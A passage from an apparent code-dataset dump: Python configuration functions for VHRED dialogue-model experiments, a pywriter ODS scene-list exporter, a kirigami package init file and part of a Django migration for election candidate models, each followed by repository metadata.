        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
        # Reweighted lower bound: cap the KL term weight at 0.25.
        'kl_divergence_max_weight': 0.25,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp10():
    """Ubuntu G-VHRED configuration (Exp10): Gaussian latent variable only,
    deep utterance-decoder input, KL weight capped at 0.5.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian on, piecewise off.
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
        # Reweighted lower bound: cap the KL term weight at 0.5.
        'kl_divergence_max_weight': 0.5,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp11():
    """Ubuntu P-VHRED configuration (Exp11): piecewise latent variable only,
    deep utterance-decoder input, KL weight capped at 0.5.

    Returns a state dict derived from prototype_state().
    """
    state = prototype_state()
    overrides = {
        # Token / special-symbol configuration (-1 marks unused symbols).
        'end_sym_utterance': '__eot__',
        'unk_sym': 0,   # unknown word token <unk>
        'eos_sym': 1,   # end-of-utterance symbol </s>
        'eod_sym': -1,  # end-of-dialogue symbol </d>
        'first_speaker_sym': -1,
        'second_speaker_sym': -1,
        'third_speaker_sym': -1,
        'minor_speaker_sym': -1,
        'voice_over_sym': -1,
        'off_screen_sym': -1,
        'pause_sym': -1,
        # Dataset locations and output directory.
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        # Optimization / training loop.
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'prefix': "UbuntuModel_",
        'updater': 'adam',
        'bs': 80,
        # Encoder/decoder architecture.
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
        # Latent variable configuration: Gaussian off, piecewise on.
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
        'deep_utterance_decoder_input': True,
        'patience': 20,
        # Reweighted lower bound: cap the KL term weight at 0.5.
        'kl_divergence_max_weight': 0.5,
    }
    for option, value in overrides.items():
        state[option] = value
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp12():
    """Ubuntu VHRED configuration, experiment 12.

    Both the Gaussian and the piecewise latent variable per utterance are
    enabled; the KL divergence weight is annealed up to a maximum of 0.5.
    """
    state = prototype_state()

    # Special tokens.  The Ubuntu corpus only uses <unk> and the
    # end-of-utterance marker; every other symbol is disabled with -1.
    state['end_sym_utterance'] = '__eot__'
    state['unk_sym'] = 0  # unknown word token <unk>
    state['eos_sym'] = 1  # end-of-utterance symbol </s>
    for sym in ('eod_sym', 'first_speaker_sym', 'second_speaker_sym',
                'third_speaker_sym', 'minor_speaker_sym', 'voice_over_sym',
                'off_screen_sym', 'pause_sym'):
        state[sym] = -1  # symbol not present in this dataset

    # Corpus locations and output naming.
    state.update({
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        'prefix': "UbuntuModel_",
    })

    # Optimization and architecture.
    state.update({
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'updater': 'adam',
        'bs': 80,  # batch size
        'patience': 20,
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'deep_utterance_decoder_input': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
    })

    # Latent variable configuration.
    state.update({
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'kl_divergence_max_weight': 0.5,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
    })
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp13():
    """Ubuntu VHRED configuration, experiment 13.

    Gaussian latent variable only (piecewise disabled); the KL divergence
    weight is annealed up to a maximum of 0.75.
    """
    state = prototype_state()

    # Special tokens.  Only <unk> and the end-of-utterance marker are used;
    # the remaining symbols are disabled with -1.
    state['end_sym_utterance'] = '__eot__'
    state['unk_sym'] = 0  # unknown word token <unk>
    state['eos_sym'] = 1  # end-of-utterance symbol </s>
    for sym in ('eod_sym', 'first_speaker_sym', 'second_speaker_sym',
                'third_speaker_sym', 'minor_speaker_sym', 'voice_over_sym',
                'off_screen_sym', 'pause_sym'):
        state[sym] = -1  # symbol not present in this dataset

    # Corpus locations and output naming.
    state.update({
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        'prefix': "UbuntuModel_",
    })

    # Optimization and architecture.
    state.update({
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'updater': 'adam',
        'bs': 80,  # batch size
        'patience': 20,
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'deep_utterance_decoder_input': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
    })

    # Latent variable configuration.
    state.update({
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': False,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'kl_divergence_max_weight': 0.75,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
    })
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp14():
    """Ubuntu VHRED configuration, experiment 14.

    Piecewise latent variable only (Gaussian disabled); the KL divergence
    weight is annealed up to a maximum of 0.75.
    """
    state = prototype_state()

    # Special tokens.  Only <unk> and the end-of-utterance marker are used;
    # the remaining symbols are disabled with -1.
    state['end_sym_utterance'] = '__eot__'
    state['unk_sym'] = 0  # unknown word token <unk>
    state['eos_sym'] = 1  # end-of-utterance symbol </s>
    for sym in ('eod_sym', 'first_speaker_sym', 'second_speaker_sym',
                'third_speaker_sym', 'minor_speaker_sym', 'voice_over_sym',
                'off_screen_sym', 'pause_sym'):
        state[sym] = -1  # symbol not present in this dataset

    # Corpus locations and output naming.
    state.update({
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        'prefix': "UbuntuModel_",
    })

    # Optimization and architecture.
    state.update({
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'updater': 'adam',
        'bs': 80,  # batch size
        'patience': 20,
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'deep_utterance_decoder_input': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
    })

    # Latent variable configuration.
    state.update({
        'add_latent_gaussian_per_utterance': False,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'kl_divergence_max_weight': 0.75,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
    })
    return state
def prototype_ubuntu_GaussPiecewise_NormOp_VHRED_Exp15():
    """Ubuntu VHRED configuration, experiment 15.

    Both the Gaussian and the piecewise latent variable per utterance are
    enabled; the KL divergence weight is annealed up to a maximum of 0.75.
    """
    state = prototype_state()

    # Special tokens.  Only <unk> and the end-of-utterance marker are used;
    # the remaining symbols are disabled with -1.
    state['end_sym_utterance'] = '__eot__'
    state['unk_sym'] = 0  # unknown word token <unk>
    state['eos_sym'] = 1  # end-of-utterance symbol </s>
    for sym in ('eod_sym', 'first_speaker_sym', 'second_speaker_sym',
                'third_speaker_sym', 'minor_speaker_sym', 'voice_over_sym',
                'off_screen_sym', 'pause_sym'):
        state[sym] = -1  # symbol not present in this dataset

    # Corpus locations and output naming.
    state.update({
        'train_dialogues': "../UbuntuData/Training.dialogues.pkl",
        'test_dialogues': "../UbuntuData/Test.dialogues.pkl",
        'valid_dialogues': "../UbuntuData/Validation.dialogues.pkl",
        'dictionary': "../UbuntuData/Dataset.dict.pkl",
        'save_dir': "Output",
        'prefix': "UbuntuModel_",
    })

    # Optimization and architecture.
    state.update({
        'max_grad_steps': 80,
        'valid_freq': 5000,
        'updater': 'adam',
        'bs': 80,  # batch size
        'patience': 20,
        'bidirectional_utterance_encoder': True,
        'deep_dialogue_encoder_input': False,
        'deep_utterance_decoder_out': True,
        'deep_utterance_decoder_input': True,
        'utterance_decoder_gating': 'LSTM',
        'direct_connection_between_encoders_and_decoder': True,
        'qdim_encoder': 1000,
        'qdim_decoder': 2000,
        'sdim': 1000,
        'rankdim': 400,
    })

    # Latent variable configuration.
    state.update({
        'add_latent_gaussian_per_utterance': True,
        'latent_gaussian_per_utterance_dim': 100,
        'scale_latent_gaussian_variable_variances': 0.1,
        'add_latent_piecewise_per_utterance': True,
        'latent_piecewise_per_utterance_dim': 100,
        'latent_piecewise_alpha_variables': 3,
        'scale_latent_piecewise_variable_alpha_use_softplus': False,
        'scale_latent_piecewise_variable_prior_alpha': 1.0,
        'scale_latent_piecewise_variable_posterior_alpha': 1.0,
        'condition_latent_variable_on_dialogue_encoder': True,
        'train_latent_variables_with_kl_divergence_annealing': True,
        'kl_divergence_annealing_rate': 1.0 / 75000.0,
        'kl_divergence_max_weight': 0.75,
        'decoder_drop_previous_input_tokens': True,
        'decoder_drop_previous_input_tokens_rate': 0.75,
    })
    return state
| 37.500916
| 127
| 0.719992
| 12,960
| 102,340
| 5.344522
| 0.044599
| 0.034173
| 0.033264
| 0.044467
| 0.905363
| 0.894723
| 0.881008
| 0.871248
| 0.861821
| 0.848524
| 0
| 0.027242
| 0.163191
| 102,340
| 2,729
| 128
| 37.500916
| 0.78156
| 0.192994
| 0
| 0.938043
| 0
| 0
| 0.530746
| 0.409382
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022003
| false
| 0
| 0.001737
| 0
| 0.045744
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1b9c1e462e14e1ccaa27a39c0113f4e587eba367
| 9,888
|
py
|
Python
|
src/pywriter/ods/ods_scenelist.py
|
peter88213/yWrestler
|
32a152e8b814983ecaef6e9861df1d6b7008568d
|
[
"MIT"
] | null | null | null |
src/pywriter/ods/ods_scenelist.py
|
peter88213/yWrestler
|
32a152e8b814983ecaef6e9861df1d6b7008568d
|
[
"MIT"
] | null | null | null |
src/pywriter/ods/ods_scenelist.py
|
peter88213/yWrestler
|
32a152e8b814983ecaef6e9861df1d6b7008568d
|
[
"MIT"
] | null | null | null |
"""Provide a class for ODS scene list export.
Copyright (c) 2022 Peter Triesberger
For further information see https://github.com/peter88213/PyWriter
Published under the MIT License (https://opensource.org/licenses/mit-license.php)
"""
from pywriter.ods.ods_file import OdsFile
class OdsSceneList(OdsFile):
    """ODS scene list representation.

    Builds a content.xml spreadsheet with one row per scene; the first
    column hyperlinks back into the manuscript ODT document.
    """
    DESCRIPTION = 'Scene list'
    SUFFIX = '_scenelist'

    # Column width:
    # co1 2.000cm
    # co2 3.000cm
    # co3 4.000cm
    # co4 8.000cm

    # Header structure:
    # Scene link
    # Scene title
    # Scene description
    # Tags
    # Scene notes
    # A/R
    # Goal
    # Conflict
    # Outcome
    # Scene
    # Words total
    # $FieldTitle1
    # $FieldTitle2
    # $FieldTitle3
    # $FieldTitle4
    # Word count
    # Letter count
    # Status
    # Characters
    # Locations
    # Items

    # content.xml prolog: 22 column definitions plus the heading row.
    # The f-string splices the shared ODS header and this class's
    # DESCRIPTION into the table name.
    _fileHeader = f'''{OdsFile._CONTENT_XML_HEADER}{DESCRIPTION}" table:style-name="ta1" table:print="false">
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co4" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co1" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co2" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co2" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
     <table:table-column table:style-name="co3" table:default-cell-style-name="Default"/>
     <table:table-row table:style-name="ro1">
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Scene link</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Scene title</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Scene description</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Tags</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Scene notes</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>A/R</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Goal</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Conflict</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Outcome</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Scene</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Words total</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>$FieldTitle1</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>$FieldTitle2</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>$FieldTitle3</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>$FieldTitle4</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Word count</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Letter count</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Status</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Characters</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Locations</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" office:value-type="string">
       <text:p>Items</text:p>
      </table:table-cell>
      <table:table-cell table:style-name="Heading" table:number-columns-repeated="1003"/>
     </table:table-row>
'''

    # Per-scene row template.  The $-placeholders are substituted by the
    # superclass's string.Template-style mapping (see _get_sceneMapping);
    # the first cell is a HYPERLINK formula into the manuscript document.
    _sceneTemplate = ''' <table:table-row table:style-name="ro2">
      <table:table-cell table:formula="of:=HYPERLINK("file:///$ProjectPath/${ProjectName}_manuscript.odt#ScID:$ID%7Cregion";"ScID:$ID")" office:value-type="string" office:string-value="ScID:$ID">
       <text:p>ScID:$ID</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Title</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Desc</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Tags</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Notes</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$ReactionScene</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Goal</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Conflict</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Outcome</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$SceneNumber">
       <text:p>$SceneNumber</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$WordsTotal">
       <text:p>$WordsTotal</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$Field1">
       <text:p>$Field1</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$Field2">
       <text:p>$Field2</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$Field3">
       <text:p>$Field3</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$Field4">
       <text:p>$Field4</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$WordCount">
       <text:p>$WordCount</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="float" office:value="$LetterCount">
       <text:p>$LetterCount</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Status</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Characters</text:p>
      </table:table-cell>
      <table:table-cell office:value-type="string">
       <text:p>$Locations</text:p>
      </table:table-cell>
      <table:table-cell>
       <text:p>$Items</text:p>
      </table:table-cell>
     </table:table-row>
'''

    # Shared closing XML for the spreadsheet document.
    _fileFooter = OdsFile._CONTENT_XML_FOOTER

    def _get_sceneMapping(self, scId, sceneNumber, wordsTotal, lettersTotal):
        """Return a mapping dictionary for a scene section.

        Positional arguments:
            scId -- str: scene ID.
            sceneNumber -- int: scene number to be displayed.
            wordsTotal -- int: accumulated wordcount.
            lettersTotal -- int: accumulated lettercount.

        Scene rating "1" is not applicable.
        Extends the superclass template method.
        """
        sceneMapping = super()._get_sceneMapping(scId, sceneNumber, wordsTotal, lettersTotal)
        # A field rating of '1' means "not applicable" (see docstring), so
        # those cells are blanked rather than showing the default value.
        if self.scenes[scId].field1 == '1':
            sceneMapping['Field1'] = ''
        if self.scenes[scId].field2 == '1':
            sceneMapping['Field2'] = ''
        if self.scenes[scId].field3 == '1':
            sceneMapping['Field3'] = ''
        if self.scenes[scId].field4 == '1':
            sceneMapping['Field4'] = ''
        return sceneMapping
| 43.179039
| 215
| 0.638451
| 1,292
| 9,888
| 4.873839
| 0.118421
| 0.176274
| 0.188979
| 0.196125
| 0.728601
| 0.728601
| 0.721613
| 0.721613
| 0.721613
| 0.718437
| 0
| 0.010944
| 0.186792
| 9,888
| 228
| 216
| 43.368421
| 0.772168
| 0.088896
| 0
| 0.581395
| 0
| 0.267442
| 0.89881
| 0.510338
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005814
| false
| 0
| 0.005814
| 0
| 0.052326
| 0.005814
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
1bbce6d6eea87aadfbaa38c2fc66bfbc3654eccd
| 205
|
py
|
Python
|
kirigami/nn/__init__.py
|
marc-harary/kirigami
|
059256f7ebb083e6b21d633d8928f4144c2f02fb
|
[
"MIT"
] | null | null | null |
kirigami/nn/__init__.py
|
marc-harary/kirigami
|
059256f7ebb083e6b21d633d8928f4144c2f02fb
|
[
"MIT"
] | 2
|
2021-01-18T03:53:35.000Z
|
2021-04-01T02:35:02.000Z
|
kirigami/nn/__init__.py
|
marc-harary/kirigami
|
059256f7ebb083e6b21d633d8928f4144c2f02fb
|
[
"MIT"
] | null | null | null |
from kirigami.nn.regularize import *
from kirigami.nn.reshape import *
from kirigami.nn.loss import *
from kirigami.nn.lstm_wrapper import *
from kirigami.nn.resnet import *
from kirigami.nn.spot import *
| 29.285714
| 38
| 0.795122
| 31
| 205
| 5.225806
| 0.354839
| 0.444444
| 0.518519
| 0.617284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117073
| 205
| 6
| 39
| 34.166667
| 0.895028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
59ed6583308ab34b301f9a5c8b63d99cf5e59ed8
| 8,882
|
py
|
Python
|
elections/migrations/0049_auto_20190510_0736.py
|
zinaukarenku/zkr-platform
|
8daf7d1206c482f1f8e0bcd54d4fde783e568774
|
[
"Apache-2.0"
] | 2
|
2018-11-16T21:45:17.000Z
|
2019-02-03T19:55:46.000Z
|
elections/migrations/0049_auto_20190510_0736.py
|
zinaukarenku/zkr-platform
|
8daf7d1206c482f1f8e0bcd54d4fde783e568774
|
[
"Apache-2.0"
] | 13
|
2018-08-17T19:12:11.000Z
|
2022-03-11T23:27:41.000Z
|
elections/migrations/0049_auto_20190510_0736.py
|
zinaukarenku/zkr-platform
|
8daf7d1206c482f1f8e0bcd54d4fde783e568774
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.1.7 on 2019-05-10 07:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated schema migration for the elections app.

    Adds biography, political-experience and work-experience tables for
    European Parliament and presidential candidates, adds personal-detail
    fields (birth data, hobbies, languages, e-mail) to the existing
    candidate models, and finally wires the new tables to their candidates
    via ForeignKey fields.
    """

    dependencies = [
        ('elections', '0048_presidentcandidatebiography'),
    ]

    operations = [
        # Biography entries for EP candidates (newest first).
        migrations.CreateModel(
            name='EuroParliamentCandidateBiography',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('bio_period', models.CharField(blank=True, max_length=15, verbose_name='Periodas')),
                ('bio_text', models.TextField(blank=True, verbose_name='Biografijos įrašas')),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
            ],
            options={
                'verbose_name': 'Biografijos įrašas',
                'verbose_name_plural': 'Biografijos įrašai',
                'ordering': ['-created_at'],
            },
        ),
        # Political experience entries for EP candidates.
        migrations.CreateModel(
            name='EuroParliamentCandidatePoliticalExperience',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('position', models.CharField(blank=True, max_length=100, verbose_name='Pareigos')),
                ('office', models.CharField(blank=True, max_length=100, verbose_name='Institucija')),
                ('start', models.DateField(blank=True, verbose_name='Pereigų pradžia')),
                ('end', models.DateField(blank=True, verbose_name='Pereigų pabaiga')),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Sukurta')),
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atnaujinta')),
            ],
            options={
                'verbose_name': 'Politinė patirties įrašas',
                'verbose_name_plural': 'Politinės patirties įrašai',
                'ordering': ['created_at'],
            },
        ),
        # Work experience entries for EP candidates.
        migrations.CreateModel(
            name='EuroParliamentCandidateWorkExperience',
            fields=[
